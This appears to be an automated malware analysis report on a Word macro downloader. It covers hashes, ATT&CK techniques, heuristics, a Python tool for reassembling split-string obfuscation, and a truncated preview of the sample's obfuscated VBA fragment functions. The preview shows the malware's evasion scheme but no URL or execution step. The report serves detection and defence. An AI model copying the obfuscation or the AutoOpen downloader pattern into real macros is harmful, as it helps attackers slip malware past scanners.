Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 60aca23d2a194947…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 163.0 KB
Created: 2016-09-05 22:43:00
Authoring application: Microsoft Office Word
First seen: 2018-01-08
MD5: f7559b3124a726c756091fc08f3b5ff7
SHA-1: ce86ea6d8abf99f3d63efd2240fc57ac44c59bb3
SHA-256: 60aca23d2a1949472ca6234f67e3bdd0ab31cb7cf309c8f62a6f43604668b909
Risk Score: 222

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment

The file contains a VBA project with an AutoOpen procedure, so the macro runs as soon as the document is opened if macros are enabled. The CreateObject calls, together with the ClamAV signature Doc.Dropper.Downloader-6398287-0, indicate a downloader: the macro's job is to fetch a second-stage payload and execute it. The source is obfuscated by splitting every meaningful string across dozens of one-line functions that each return a one- or two-character literal (for example "Ob", "je", "//", "md", ".8", "0)"), padded with junk comments made of random dictionary words; the pieces are only concatenated at run time, and the concatenation site is not in the portion of the source shown below. The download URL and the exact execution method therefore cannot be read off the static output, although fragments such as "//" and "md" are consistent with a URL and a cmd invocation. Reassembling the fragment functions is the quickest way to recover them; the overall pattern is that of a macro downloader/dropper.
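The split-string obfuscation described above can be undone mechanically. The following Python is an added example written for this page; it is not the report's tooling, not oletools, and not code from the sample. It maps every fragment function to its literal, resolves functions that are themselves built from other fragments, rewrites the concatenation sites, and lists the suspicious tokens that a keyword scan of the raw source would miss. SAMPLE_VBA is a constructed input in the style of the preview; the strings it yields (CreateObject, WScript.Shell) are assumptions for the demo, not values recovered from this sample.

```python
import re

FUNC_RE = re.compile(r"^Function\s+(?P<name>\w+)\s*\(\)\s*\n(?P<body>.*?)\nEnd Function", re.S | re.M)
LITERAL_RE = re.compile(r'^\s*(?P<var>\w+)\s*=\s*"(?P<lit>[^"]*)"\s*$', re.M)
ASSIGN_RE = re.compile(r"^\s*(?:Set\s+)?(?P<lhs>\w+)\s*=\s*(?P<expr>.+?)\s*$", re.M)
CALL_RE = re.compile(r"(?P<name>\w+)\s*\(\s*\)")
# Tokens that macro heuristics (CreateObject / shell / download) key on.
SUSPICIOUS = ("CreateObject", "WScript.Shell", "cmd", "powershell", "http://", "XMLHTTP")

def split_concat(expr):
    """Split on '&' / '+' that sit outside string literals."""
    parts, buf, in_str = [], [], False
    for ch in expr:
        if ch == '"':
            in_str = not in_str
        if ch in "&+" and not in_str:
            parts.append("".join(buf).strip())
            buf = []
        else:
            buf.append(ch)
    return parts + ["".join(buf).strip()]

def resolve(expr, frags):
    """Concatenate literals and known fragment calls; None if any operand is unknown."""
    out = []
    for part in split_concat(expr):
        if len(part) >= 2 and part[0] == '"' and part[-1] == '"':
            out.append(part[1:-1].replace('""', '"'))
        elif (call := CALL_RE.fullmatch(part)) and call.group("name") in frags:
            out.append(frags[call.group("name")])
        else:
            return None
    return "".join(out)

def fragment_map(src):
    """Map each fragment function to the string it returns (nested ones via a fixpoint)."""
    frags, pending = {}, {}
    for m in FUNC_RE.finditer(src):
        name, body = m.group("name"), m.group("body")
        lits = dict(LITERAL_RE.findall(body))          # local var -> literal
        for lhs, expr in ASSIGN_RE.findall(body):
            if lhs == name:                            # the return statement
                if expr in lits:
                    frags[name] = lits[expr]           # name = localvar
                else:
                    pending[name] = expr               # name = a() & "x" & b()
    changed = True
    while pending and changed:
        changed = False
        for name, expr in list(pending.items()):
            if (value := resolve(expr, frags)) is not None:
                frags[name], changed = value, True
                del pending[name]
    return frags

def assembled_strings(src, frags):
    """Every assignment that joins fragments and/or literals, fully resolved."""
    found = {}
    for lhs, expr in ASSIGN_RE.findall(src):
        parts = split_concat(expr)
        if len(parts) == 1 and parts[0].startswith('"'):
            continue                                   # plain literal, nothing hidden
        if (value := resolve(expr, frags)) is not None:
            found[lhs] = value
    return found

def hidden_tokens(src, strings):
    """Suspicious tokens present only after reassembly (a raw keyword scan misses them)."""
    raw, joined = src.lower(), "\n".join(strings.values()).lower()
    return {t for t in SUSPICIOUS if t.lower() in joined and t.lower() not in raw}

# Constructed sample in the style of the report's preview; the values it yields
# (CreateObject, WScript.Shell) are assumptions, not recovered from the real sample.
SAMPLE_VBA = '''\
Function qawol()
Dim ruq
ruq = "Crea"
qawol = ruq
End Function
Function dezum()
Dim bik
'barnacle trellis wombat gimlet
bik = "teOb"
dezum = bik
End Function
Function yfrot()
Dim tol
tol = "ject"
yfrot = tol
End Function
Function nucaw()
nucaw = "ipt.Sh"
End Function
Function gribon()
gribon = "WScr" & nucaw() & "ell"
End Function
Sub AutoOpen()
Dim fn, pg
fn = qawol() & dezum() & yfrot()
pg = gribon()
End Sub
'''
```

On a real extraction, read the olevba output (macros.bas in this report) into `src`, then call `fragment_map(src)` followed by `assembled_strings(src, frags)`; join VBA line continuations (a trailing ` _`) first, because the patterns work line by line. The resolver deliberately evaluates only literals and fragment calls; families that wrap fragments in Chr(), StrReverse() or Replace() need those calls evaluated as an extra step rather than guessed.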

Heuristics (7)

  • [critical] CLAMAV_DETECTION: ClamAV: Doc.Dropper.Downloader-6398287-0
    ClamAV detected this file as malware: Doc.Dropper.Downloader-6398287-0
  • [medium] OLE_VBA_MACROS: VBA macros detected (3 related findings)
    Document contains VBA macro code
  • [high] OLE_VBA_AUTOOPEN: AutoOpen macro
    The VBA project defines an AutoOpen procedure, which Word runs as soon as the document is opened (subject to the macro security setting).
  • [high] OLE_VBA_CREATEOBJ: CreateObject call
    The macro calls CreateObject, the usual way for a downloader to instantiate COM objects that reach the network and launch processes.
  • [high] OLE_VBA_PCODE_AUTOEXEC_EXEC: VBA p-code auto-exec with execution tokens
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC: Legacy WordBasic auto-exec macro marker
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. For this sample a VBA project was in fact recovered (macros.bas under Extracted artifacts), so the marker duplicates OLE_VBA_AUTOOPEN rather than adding independent evidence.
  • [info] EMBEDDED_URL: Embedded URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main    In document text (OLE body). This is the standard DrawingML XML namespace URI that Word embeds in any document with drawing content; it is not a payload location and should not be treated as an indicator.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename     Kind        Source                                                Size
macros.bas   vba-macro   oletools.olevba.extract_macros (decoded VBA source)   40151 bytes
             SHA-256: 2ff54dbff96fe83306248c2f1042b5d224b67234f067d0b279e4d3fd5e4bea76

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function ugsyrips()
Dim womfacm
womfacm = "am"
ugsyrips = womfacm
End Function
Function admefok()
Dim vucxelidf
vucxelidf = "s."
admefok = vucxelidf
'curt appropriating seemlier household girdling named quarters
End Function
Function dgowzarij()
Dim purfiflugz
purfiflugz = "er"
dgowzarij = purfiflugz
End Function
Function ssefof()
Dim abnowhorgo
abnowhorgo = ", "
'suggestiveness crafty arising fatuity verified drove twinkling unforced contriving
ssefof = abnowhorgo
End Function
Function yxsolda()
Dim bozafo
bozafo = " A"
'remaking babysit minestrone colloquium giro meltdown botch judgement acuteness
yxsolda = bozafo
End Function
Function ophybe()
Dim iczegqyt
iczegqyt = " ="
ophybe = iczegqyt
End Function
Function emwalo()
Dim upypkat
'plated jealousy trueblue fetus retyped jeopardising pails
upypkat = "ne"
emwalo = upypkat
End Function
Function cluzworly()
Dim awexom
awexom = "dr"
'circling joiner martinet weight inadvertent unmerited frisks
cluzworly = awexom
End Function
Function ixusgemta()
Dim olcodcyv
olcodcyv = "= "
'duel tepid tweaking snapshot leaped beans underwater tufts devoid
ixusgemta = olcodcyv
End Function
Function ufagucq()
Dim rulerh
rulerh = "re"
ufagucq = rulerh
End Function
'pamphleteer deposing thirst vesicles gobbet analogise
Function asimnulli()
Dim lemafru
lemafru = "se"
asimnulli = lemafru
End Function
Function yqiwo()
Dim jereba
jereba = "Ob"
'player dandy breakfasted bygones spec comical waitresses reverential double
yqiwo = jereba
End Function
Function adyqoho()
Dim ilefuz
ilefuz = "in"
adyqoho = ilefuz
End Function
Function xzicak()
Dim ocyrdec
'consummately hips scatter monarchical snorting
ocyrdec = "ec"
xzicak = ocyrdec
End Function
Function alugci()
Dim xtybomma
xtybomma = "t "
alugci = xtybomma
End Function
'waded directorate washboard scuff teasingly headmasters molestations bust
Function iropeh()
Dim orhutihme
orhutihme = ".8"
iropeh = orhutihme
End Function
Function odselbefw()
Dim onoba
'secessionist disinfected homologous visualise placating thunderstorm grown
onoba = "0)"
odselbefw = onoba
End Function
Function izvowkyzi()
Dim azimac
azimac = "//"
'pictorial insulin rivets heaters defences showman caprice plodding
izvowkyzi = azimac
End Function
Function pilqutaws()
Dim dysrykiqh
dysrykiqh = "iv"
pilqutaws = dysrykiqh
'suffocates antiquities riffled nuttier portcullis bustles reasonable mourner passionless
End Function
Function afygsoxr()
Dim ysixose
ysixose = "()"
afygsoxr = ysixose
End Function
'voucher depleting protectorates navigator poundage basketball annulled
Function ecyxu()
Dim tbyscosis
tbyscosis = "md"
ecyxu = tbyscosis
End Function
Function gyfwok()
Dim juqkiq
juqkiq = ";v"
gyfwok = juqkiq
'jurisprudential vacillate boater fillets soggy conduct
End Function
Function thujesub()
Dim duhebxe
duhebxe = "tr"
thujesub = duhebxe
End Function
Function wcimopl()
Dim situnc
'escapade gloat bags disjunct silliest chortling untidiness
situnc = "th"
wcimopl = situnc
End Function
Function ajrusrerra()
Dim daqjubkow
daqjubkow = "t "
ajrusrerra = daqjubkow
End Function
'own gavel girder maids repossessions
Function ofpyzhe()
Dim bzocyna
bzocyna = "pN"
ofpyzhe = bzocyna
End Function
Function nnetoqs()
Dim vzoqvuzfesk
vzoqvuzfesk = ".P"
'predating straighter flute conciliatory royally
nnetoqs = vzoqvuzfesk
End Function
Function uvettuw()
Dim irmiwego
irmiwego = "je"
uvettuw = irmiwego
End Function
Function tqesnyqq()
'ammeter omelettes caricature lur postmortems tempter offering cheroot aimer
Dim acpona
acpona = "yp"
tqesnyqq = acpona
End Function
Function axqinpu()
Dim akpibo
akpibo = "am"
axqinpu = akpibo
'constrict plungers epilogue peram
... (truncated)